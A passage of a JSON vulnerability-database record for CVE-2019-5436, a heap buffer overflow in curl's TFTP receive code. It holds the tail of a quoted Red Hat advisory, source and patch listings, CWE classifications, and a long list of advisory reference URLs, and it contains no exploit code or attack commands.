7):\n\nSource:\ncurl-7.29.0-57.el7.src.rpm\n\nppc64:\ncurl-7.29.0-57.el7.ppc64.rpm\ncurl-debuginfo-7.29.0-57.el7.ppc.rpm\ncurl-debuginfo-7.29.0-57.el7.ppc64.rpm\nlibcurl-7.29.0-57.el7.ppc.rpm\nlibcurl-7.29.0-57.el7.ppc64.rpm\nlibcurl-devel-7.29.0-57.el7.ppc.rpm\nlibcurl-devel-7.29.0-57.el7.ppc64.rpm\n\nppc64le:\ncurl-7.29.0-57.el7.ppc64le.rpm\ncurl-debuginfo-7.29.0-57.el7.ppc64le.rpm\nlibcurl-7.29.0-57.el7.ppc64le.rpm\nlibcurl-devel-7.29.0-57.el7.ppc64le.rpm\n\ns390x:\ncurl-7.29.0-57.el7.s390x.rpm\ncurl-debuginfo-7.29.0-57.el7.s390.rpm\ncurl-debuginfo-7.29.0-57.el7.s390x.rpm\nlibcurl-7.29.0-57.el7.s390.rpm\nlibcurl-7.29.0-57.el7.s390x.rpm\nlibcurl-devel-7.29.0-57.el7.s390.rpm\nlibcurl-devel-7.29.0-57.el7.s390x.rpm\n\nx86_64:\ncurl-7.29.0-57.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-57.el7.i686.rpm\ncurl-debuginfo-7.29.0-57.el7.x86_64.rpm\nlibcurl-7.29.0-57.el7.i686.rpm\nlibcurl-7.29.0-57.el7.x86_64.rpm\nlibcurl-devel-7.29.0-57.el7.i686.rpm\nlibcurl-devel-7.29.0-57.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\ncurl-7.29.0-57.el7.src.rpm\n\nx86_64:\ncurl-7.29.0-57.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-57.el7.i686.rpm\ncurl-debuginfo-7.29.0-57.el7.x86_64.rpm\nlibcurl-7.29.0-57.el7.i686.rpm\nlibcurl-7.29.0-57.el7.x86_64.rpm\nlibcurl-devel-7.29.0-57.el7.i686.rpm\nlibcurl-devel-7.29.0-57.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-5436\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.8_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXoObWtzjgjWX9erEAQiZbxAAqKGZZqZXMjb1Ia8ST1HZTC8mBxlxQM9Z\nqwT3r0czzMc2PaMlmMbvBPr7JLybKl9bxb8ufMhCAQwvOYsIZ6mLlV+dwLVnpDJr\nu+I9HhOBjsJgbzspOl8XuyRyylcOXiZmDbuU5JarhGvrMgApHujgzxMwXDedApPP\nMvtbhMHNOiTrYXhMy6IrTkPoFdPaziNWLAw1TTbfMSsF2C9CUjXCpmRpv+ttq85q\n9Ms3wbGuS2tDm9/6grtarY3SxeSoaMg0VR3YJQ4J7jIXoeeHxQSs0K1mBVekEZ9r\nJcqgynjNqEQP1dcfzOxorRcXD7i2NFC1WLGdAM16KlETiN3Fpcb4nVF+0phU3ea+\nhJsKwKEAb6CX+qLi/uITr6m0xYy323QTNCvOHX/xtf6EnpJhq1UsltBOzm/KjL1T\nN0ClNjEs7/57TEIwE9u3LhDuPfQfdkewRv2QEqLdpNw5JqT8p+dxlrJNzCTkbFPc\nbgmHZdvfJ5blQweL/ejCE5zmr9jKYbhqyrdBn7sxKj1gn6R9ZHcX14pljDbLAjp/\ncBWx9zscU82xyh49QAl8VHabiHpOU9c7SaUz+9G3WzZboaJNUoBrPTPvsXg1nGW7\n0f3qjx/Y3/MRR8qCNL7VtNA+8QCGryMU+Gs5cxNnWmtfW0i5kpHCU7cxk/+ig2JZ\nM95S58Xnb8U=\n=UHVC\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-5436"
      },
      {
        "db": "BID",
        "id": "108435"
      },
      {
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "db": "PACKETSTORM",
        "id": "153051"
      },
      {
        "db": "PACKETSTORM",
        "id": "156753"
      },
      {
        "db": "PACKETSTORM",
        "id": "153003"
      },
      {
        "db": "PACKETSTORM",
        "id": "158035"
      },
      {
        "db": "PACKETSTORM",
        "id": "156523"
      },
      {
        "db": "PACKETSTORM",
        "id": "159727"
      },
      {
        "db": "PACKETSTORM",
        "id": "157425"
      },
      {
        "db": "PACKETSTORM",
        "id": "156986"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-5436",
        "trust": 2.9
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/09/11/6",
        "trust": 1.8
      },
      {
        "db": "BID",
        "id": "108435",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "158035",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "157425",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "156523",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "153051",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156753",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "153003",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.1874",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2033",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0651",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1494",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1177",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.1837",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4380",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4780",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3700",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2593",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "156986",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "153010",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-156871",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-5436",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "159727",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "db": "BID",
        "id": "108435"
      },
      {
        "db": "PACKETSTORM",
        "id": "153051"
      },
      {
        "db": "PACKETSTORM",
        "id": "156753"
      },
      {
        "db": "PACKETSTORM",
        "id": "153003"
      },
      {
        "db": "PACKETSTORM",
        "id": "158035"
      },
      {
        "db": "PACKETSTORM",
        "id": "156523"
      },
      {
        "db": "PACKETSTORM",
        "id": "159727"
      },
      {
        "db": "PACKETSTORM",
        "id": "157425"
      },
      {
        "db": "PACKETSTORM",
        "id": "156986"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "id": "VAR-201905-0095",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-156871"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-03-09T22:42:35.251000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Haxx libcurl Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92898"
      },
      {
        "title": "Red Hat: Low: curl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202505 - Security Advisory"
      },
      {
        "title": "Red Hat: Low: curl security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20201020 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: curl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20201792 - Security Advisory"
      },
      {
        "title": "Ubuntu Security Notice: curl vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3993-2"
      },
      {
        "title": "Ubuntu Security Notice: curl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3993-1"
      },
      {
        "title": "Debian CVElist Bug Report Logs: curl: CVE-2019-5436: TFTP receive buffer overflow",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=af8cb489ed21fcca996e119afe1e5163"
      },
      {
        "title": "Debian CVElist Bug Report Logs: curl: CVE-2019-5435: Integer overflows in curl_url_set",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=fae65389c96796d30251ace6eb631de7"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201905-16] curl: arbitrary code execution",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-16"
      },
      {
        "title": "Debian Security Advisories: DSA-4633-1 curl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=13ee33e4932409d819a833a7d96f2574"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201905-12] libcurl-gnutls: arbitrary code execution",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-12"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201905-11] libcurl-compat: arbitrary code execution",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-11"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2019-1233",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2019-1233"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2019-5436"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2019-1233",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2019-1233"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201905-15] lib32-curl: arbitrary code execution",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-15"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201905-14] lib32-libcurl-compat: arbitrary code execution",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-14"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201905-13] lib32-libcurl-gnutls: arbitrary code execution",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-13"
      },
      {
        "title": "Red Hat: Important: Container-native Virtualization security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203194 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift Container Platform 4.6.1 image security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204298 - Security Advisory"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "cve",
        "trust": 0.1,
        "url": "https://github.com/michwqy/cve "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-122",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-119",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://curl.haxx.se/docs/cve-2019-5436.html"
      },
      {
        "trust": 1.9,
        "url": "https://security.gentoo.org/glsa/202003-29"
      },
      {
        "trust": 1.8,
        "url": "https://seclists.org/bugtraq/2020/feb/36"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20190606-0004/"
      },
      {
        "trust": 1.8,
        "url": "https://support.f5.com/csp/article/k55133295"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2020/dsa-4633"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2019/09/11/6"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00008.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00017.html"
      },
      {
        "trust": 1.3,
        "url": "http://www.securityfocus.com/bid/108435"
      },
      {
        "trust": 1.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5436"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/smg3v4vtx2se3ew3hqtn3ddlqbtorqc2/"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k55133295?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 0.9,
        "url": "http://curl.haxx.se/"
      },
      {
        "trust": 0.9,
        "url": "https://seclists.org/oss-sec/2019/q2/124"
      },
      {
        "trust": 0.9,
        "url": "https://usn.ubuntu.com/3993-1"
      },
      {
        "trust": 0.9,
        "url": "https://usn.ubuntu.com/3993-2"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/smg3v4vtx2se3ew3hqtn3ddlqbtorqc2/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2019-5436"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-5436cve-2019-5436curl:tftpreceiveheapbufferoverflowintftp_receive_packet()function"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k55133295?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1108041"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/3993-1/"
      },
      {
        "trust": 0.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00036.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3700/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156523/debian-security-advisory-4633-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-flex-system-switch-firmware-products-are-affected-by-a-vulnerability-in-libcurl-cve-2019-5436/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1143490"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2593/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153003/ubuntu-security-notice-usn-3993-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2033/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.1874/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0651/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4780/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-libcurl-affects-the-os-image-for-redhat-enterprise-linux-for-ibm-cloud-pak-system-cve-2019-5436/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/curl-multiple-vulnerabilities-29382"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4380/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.1837/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153051/slackware-security-advisory-curl-updates.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/157425/red-hat-security-advisory-2020-1792-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1494/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1177/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bladecenter-advanced-management-module-amm-is-affected-by-a-vulnerability-in-libcurl-cve-2019-5436/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156753/gentoo-linux-security-advisory-202003-29.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/158035/red-hat-security-advisory-2020-2505-01.html"
      },
      {
        "trust": 0.4,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "cve-2019-5436 curl: tftp receive heap buffer overflow in tftp_receive_packet() function"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5435"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5482"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5481"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:2505"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#low"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5482"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://support.f5.com/csp/article/k55133295?utm_source=f5support\u0026amp;amp;utm_medium=rss"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/787.html"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=60232"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/3993-2/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-5436"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-5435"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.61.0-1ubuntu2.4"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.7"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.64.0-2ubuntu1.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.47.0-1ubuntu2.13"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3993-1"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/curl"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8768"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8535"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10743"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15718"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20657"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19126"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12448"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8611"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8203"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6251"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8676"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-1549"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-9251"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17451"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20060"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-19519"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11070"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-7150"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-1547"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-7664"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8607"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12052"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14973"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15366"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8690"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20060"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13752"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8601"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3822"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11324"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3823"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-7146"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-1010204"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11324"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11236"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8524"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-10739"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16890"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8536"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8686"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8671"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12447"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8544"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12049"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8571"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-19519"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15719"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2013-0169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8677"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-18624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8595"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13753"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8558"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11459"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12447"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8679"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12795"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20657"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5094"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3844"
      },
      {
